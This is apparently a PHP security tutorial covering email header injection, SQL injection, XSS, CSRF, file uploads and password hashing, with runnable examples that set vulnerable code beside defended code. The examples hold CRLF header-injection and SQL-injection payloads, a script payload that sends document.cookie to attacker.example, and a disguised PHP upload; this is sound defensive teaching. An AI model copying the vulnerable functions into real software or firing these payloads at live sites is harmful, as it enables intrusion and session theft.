Security

Preventing Email Injection in PHP

Security measures should be taken to prevent email injection in PHP, most notably the injection of spam-related content, such as extra headers or recipients, into the email.
Emails in PHP are often sent with the standard mail() function, so your code might look something like this:
mail("support@somewebsite.com", "Contact Form Reply", $message, "From: $email");
The code above sends the message to …
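The injection point in the snippet above is the "From: $email" header. As an added example that is not the original post's code, the script below runs a constructed injection payload through both the unsafe header builder and a validating one. The function names (buildFromHeaderUnsafe, isSafeHeaderValue, buildFromHeader) and the sample addresses are assumptions; the mail() call is left commented out so the script runs without a mail transfer agent. Targets PHP 7.1 or later.

```php
<?php
// Added example (not from the original post). Email (header) injection relies
// on smuggling CR/LF into a header value so that attacker-supplied headers such
// as Bcc: or an extra To: are appended to the message.

function buildFromHeaderUnsafe(string $email): string
{
    // The pattern from the contact-form snippet: user input goes straight
    // into a header line.
    return "From: $email";
}

function isSafeHeaderValue(string $value): bool
{
    // No header value may contain a line break; that is what separates headers.
    return preg_match('/[\r\n]/', $value) !== 1;
}

function buildFromHeader(string $email): ?string
{
    // Reject anything that is not a single syntactically valid address.
    // FILTER_VALIDATE_EMAIL already rejects CR/LF, but the explicit check makes
    // the intent visible and applies to any other header you interpolate.
    if (!isSafeHeaderValue($email) || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    return "From: $email";
}

// Constructed inputs: a normal address and an injection attempt that tries to
// add a Bcc: header carrying two extra recipients.
$inputs = [
    'alice@example.com',
    "alice@example.com\r\nBcc: victim1@example.net, victim2@example.net",
];

foreach ($inputs as $email) {
    echo "Input: " . json_encode($email) . "\n";
    echo "  unsafe header block:\n    "
        . str_replace("\r\n", "\n    ", buildFromHeaderUnsafe($email)) . "\n";

    $header = buildFromHeader($email);
    if ($header === null) {
        echo "  validated: rejected\n\n";
        continue;
    }
    echo "  validated: $header\n\n";
    // Only a validated header reaches mail(). Commented out so the script runs
    // without a configured mail transfer agent.
    // mail('support@somewebsite.com', 'Contact Form Reply', $message, $header);
}
```

The same rule applies to every value that ends up in a header (Reply-To, Subject, Cc): check it for CR and LF before interpolating it, or reject it outright as above. Body text is not affected by header injection and should only be validated for length and content.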

Preventing SQL Injection in PHP

SQL Injection is a technique by which an attacker alters the SQL commands an application sends to its database in order to expose or overwrite data, or to execute other dangerous commands. Preventing SQL injection in PHP can be achieved by following the steps in the post below.
Consider a simple form that contains a username and password field. Without sufficient security measures, the attacker could add the …
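As an added example, not the post's own code, the script below runs the login lookup described above both ways against an in-memory SQLite database so that it works offline (requires PHP's pdo_sqlite extension; PHP 7.1 or later). The table, the user record and the attacker payloads are constructed for the demonstration. In the concatenated version the first payload comments out the password comparison and the second turns the WHERE clause into a tautology; in the prepared-statement version they are just unusual strings that match no user. Passwords are stored in plain text only to keep the example short; see the hashing section below for how they should be stored.

```php
<?php
// Added example (not from the original post). Requires the pdo_sqlite extension.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Constructed schema and record. Plain-text passwords are used here only to
// keep the example short.
$db->exec('CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)');
$db->exec("INSERT INTO users (username, password) VALUES ('alice', 'correct horse battery')");

function loginVulnerable(PDO $db, string $user, string $pass): bool
{
    // User input is spliced into the SQL text. A quote in the input closes the
    // string literal and everything after it is parsed as SQL.
    $sql = "SELECT COUNT(*) FROM users WHERE username = '$user' AND password = '$pass'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

function loginSafe(PDO $db, string $user, string $pass): bool
{
    // The query structure is fixed at prepare time; the values travel
    // separately as parameters and can never change the statement.
    $stmt = $db->prepare('SELECT COUNT(*) FROM users WHERE username = ? AND password = ?');
    $stmt->execute([$user, $pass]);
    return (int) $stmt->fetchColumn() > 0;
}

// Constructed inputs: a correct login, a wrong password, and two classic payloads.
$attempts = [
    'correct password'         => ['alice', 'correct horse battery'],
    'wrong password'           => ['alice', 'guess'],
    'comment out the check'    => ["alice' -- ", 'anything'],
    'tautology in both fields' => ["' OR '1'='1", "' OR '1'='1"],
];

foreach ($attempts as $label => [$user, $pass]) {
    printf("%-26s concatenated: %-9s prepared: %s\n",
        $label,
        loginVulnerable($db, $user, $pass) ? 'accepted' : 'rejected',
        loginSafe($db, $user, $pass) ? 'accepted' : 'rejected');
}
```

Placeholders only cover values. Table and column names, ORDER BY directions and LIMIT counts cannot be bound as parameters, so those must be checked against an allowlist in PHP before they are put into the SQL string.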

Preventing XSS in PHP

Cross Site Scripting (XSS) is one of the most common forms of attack against websites. This article will show you simple methods of preventing XSS in PHP.
The attack works by injecting code, which becomes possible when user input isn't correctly sanitised or escaped at the point where it is output to the browser. This can …
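The escaping step the article refers to, as an added example that is not the article's own code (PHP 7.1 or later): the same fragment of markup rendered with raw interpolation and with every piece of user input passed through htmlspecialchars() at output time. The helper name e() and the two payloads are constructed for the demonstration.

```php
<?php
// Added example (not from the original post).

function e(string $value): string
{
    // ENT_QUOTES escapes both " and ', so the output is safe inside element
    // text and inside single- or double-quoted attributes. ENT_SUBSTITUTE
    // replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderUnsafe(string $name, string $search): string
{
    // User input interpolated straight into markup.
    return "<p>Hello, $name</p>\n<input name=\"q\" value=\"$search\">";
}

function renderSafe(string $name, string $search): string
{
    // Same markup, every piece of user input escaped at the point of output.
    return "<p>Hello, " . e($name) . "</p>\n<input name=\"q\" value=\"" . e($search) . "\">";
}

// Constructed payloads: one aimed at element text, one that breaks out of an
// attribute value and adds an event handler.
$name   = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';
$search = '" autofocus onfocus="alert(document.domain)';

echo "Unescaped output:\n" . renderUnsafe($name, $search) . "\n\n";
echo "Escaped output:\n" . renderSafe($name, $search) . "\n";
```

Escaping is context-specific. htmlspecialchars() is correct for element text and quoted attribute values; data placed inside a script block needs json_encode(), and data placed in a URL query string needs rawurlencode(), because the characters that are dangerous differ in each context.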

Preventing CSRF in PHP

Preventing CSRF in PHP is fairly easy once you know how, yet many websites remain vulnerable to this type of attack.
Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious site or email causes a user’s browser to perform an unwanted action on a …
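The standard defence is a per-session secret token that every state-changing form must send back. The script below is an added example, not the post's own code (PHP 7.1 or later): the function names csrfToken(), csrfField() and csrfValid() and the three constructed POST bodies are assumptions, and $_SESSION is assigned directly instead of calling session_start() so the script runs from the command line.

```php
<?php
// Added example (not from the original post).

function csrfToken(): string
{
    // One random, unguessable token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrfField(): string
{
    // Hidden field to include in every state-changing form.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrfValid(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    // A page on another origin can make the browser send the request, but it
    // cannot read this site's pages, so it cannot learn the token.
    // hash_equals compares in constant time.
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

// In a real application call session_start() first; here the array is assigned
// directly so the script runs from the command line.
$_SESSION = [];

echo "Form field: " . csrfField() . "\n";

// Constructed POST bodies: the site's own form, a forged request from another
// origin (no token), and a forged request with a guessed token.
$requests = [
    'legitimate form'  => ['csrf_token' => csrfToken(), 'amount' => '100'],
    'forged, no token' => ['amount' => '100'],
    'forged, guessed'  => ['csrf_token' => str_repeat('0', 64), 'amount' => '100'],
];

foreach ($requests as $label => $post) {
    printf("%-18s %s\n", $label . ':', csrfValid($post) ? 'accepted' : 'rejected');
}
```

Run csrfValid() on every POST before acting on it, and make sure no state change is reachable by GET, since a token in a hidden field does nothing for a request the browser sends by following a link or loading an image. Setting the session cookie's SameSite attribute is a useful second layer but is not a replacement for the token.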

File Uploads in PHP

File uploads in PHP allow users to upload both text and binary files. With PHP’s authentication and file manipulation functions, you have full control over who is allowed to upload and what is done with a file once it has been uploaded.
First of all, you’ll need to check that your server’s file_uploads …
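As an added example, not the post's own code (PHP 7.1 or later), the script below shows the server-side checks that belong after the configuration step: verify the upload succeeded, cap the size, sniff the real content type against an allowlist, ignore the client-supplied filename and type, and store the file under a random name outside the web root. The constants, function names and directory are assumptions. Because a real upload only exists during an HTTP request, the demonstration feeds validateUpload() two constructed $_FILES-style entries written to temporary files: a minimal PNG, and a PHP script renamed to look like an image. storeUpload() is included for completeness but not called, since is_uploaded_file() and move_uploaded_file() only accept files PHP itself received.

```php
<?php
// Added example (not from the original post).

const UPLOAD_MAX_BYTES = 2 * 1024 * 1024;
// Allowlist: detected MIME type => extension the stored file will get.
// The client-supplied name and type are never trusted.
const UPLOAD_ALLOWED = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
];

/**
 * Validate one entry of $_FILES. Returns [extension, null] on success or
 * [null, error message] on failure.
 */
function validateUpload(array $file): array
{
    $code = $file['error'] ?? UPLOAD_ERR_NO_FILE;
    if ($code !== UPLOAD_ERR_OK) {
        return [null, "upload failed with error code $code"];
    }
    if ($file['size'] > UPLOAD_MAX_BYTES) {
        return [null, 'file too large'];
    }
    // Sniff the content; $file['type'] comes from the client and can say anything.
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $mime    = $finfo->file($file['tmp_name']);
    $allowed = UPLOAD_ALLOWED;
    if (!isset($allowed[$mime])) {
        return [null, "content type $mime is not allowed"];
    }
    return [$allowed[$mime], null];
}

/**
 * Move a validated upload to a directory outside the web root under a random
 * name, so the original filename never reaches the filesystem and the file
 * cannot be requested (or executed) directly.
 */
function storeUpload(array $file, string $ext, string $dir): string
{
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    $dest = rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not move upload');
    }
    return $dest;
}

// Constructed stand-ins for $_FILES entries so the validation runs from the
// command line: a minimal 1x1 PNG and a PHP script renamed to look like an image.
$png = "\x89PNG\r\n\x1a\n" . pack('N', 13) . 'IHDR'
     . pack('NNCCCCC', 1, 1, 8, 2, 0, 0, 0) . "\x90\x77\x53\xde";
$php = "<?php phpinfo(); ?>";

$samples = [];
foreach (['cat.png' => $png, 'shell.png' => $php] as $name => $bytes) {
    $tmp = tempnam(sys_get_temp_dir(), 'upl');
    file_put_contents($tmp, $bytes);
    $samples[] = [
        'name' => $name, 'type' => 'image/png', 'tmp_name' => $tmp,
        'error' => UPLOAD_ERR_OK, 'size' => strlen($bytes),
    ];
}

foreach ($samples as $file) {
    [$ext, $err] = validateUpload($file);
    echo $file['name'] . ': ' . ($err ?? "accepted, would be stored as .$ext") . "\n";
    unlink($file['tmp_name']);
}
```

The size check in PHP code is a backstop only; the real limit is enforced earlier by the upload_max_filesize and post_max_size directives in php.ini, which is why the post starts with the server configuration.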

Zend PHP 5 – Security – Password Hashing API

When storing passwords, the golden rule is never to store them in plain text. PHP provides several functions for hashing passwords.
md5() and sha1()
Hashing algorithms such as MD5 and SHA1 are very fast and efficient. Unfortunately, with modern computers it has become trivial to "brute force" the output of these algorithms to determine …
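The API the title refers to is password_hash(), password_verify() and password_needs_rehash(), available since PHP 5.5. The script below is an added example, not the original article's code (PHP 7.1 or later): it registers two users with the same password and shows that the unsalted md5() digest is identical for both while the password_hash() output differs, then verifies logins and upgrades a stored hash when its parameters are out of date. The in-memory $users array, the cost of 12 and the function names are assumptions.

```php
<?php
// Added example (not from the original post). Uses the password hashing API
// added in PHP 5.5 (password_hash / password_verify / password_needs_rehash).

const HASH_ALGO    = PASSWORD_DEFAULT;   // bcrypt today; may change in later PHP versions
const HASH_OPTIONS = ['cost' => 12];     // raise as hardware gets faster

function registerUser(array &$users, string $username, string $password): void
{
    // Each call generates its own random salt, so equal passwords give
    // different hashes and the salt is stored inside the hash string.
    $users[$username] = password_hash($password, HASH_ALGO, HASH_OPTIONS);
}

function loginUser(array &$users, string $username, string $password): bool
{
    $hash = $users[$username] ?? null;
    if ($hash === null) {
        return false;
    }
    if (!password_verify($password, $hash)) {
        return false;
    }
    // On a successful login the plain password is available, so a hash made
    // with older parameters (lower cost, older algorithm) can be upgraded.
    if (password_needs_rehash($hash, HASH_ALGO, HASH_OPTIONS)) {
        $users[$username] = password_hash($password, HASH_ALGO, HASH_OPTIONS);
    }
    return true;
}

// Constructed in-memory user store: username => stored hash.
$users = [];
registerUser($users, 'alice', 'correct horse battery staple');
registerUser($users, 'bob',   'correct horse battery staple');

echo "md5 of the shared password (unsalted, fast): " . md5('correct horse battery staple') . "\n";
echo "alice: " . $users['alice'] . "\n";
echo "bob:   " . $users['bob'] . "\n";

var_dump(loginUser($users, 'alice', 'correct horse battery staple'));
var_dump(loginUser($users, 'alice', 'wrong password'));
var_dump(loginUser($users, 'carol', 'anything'));
```

Two caveats worth knowing: bcrypt, the current PASSWORD_DEFAULT, only uses the first 72 bytes of the password, so very long passphrases are silently truncated; and the cost parameter should be chosen by timing password_hash() on the production hardware rather than copied from an example.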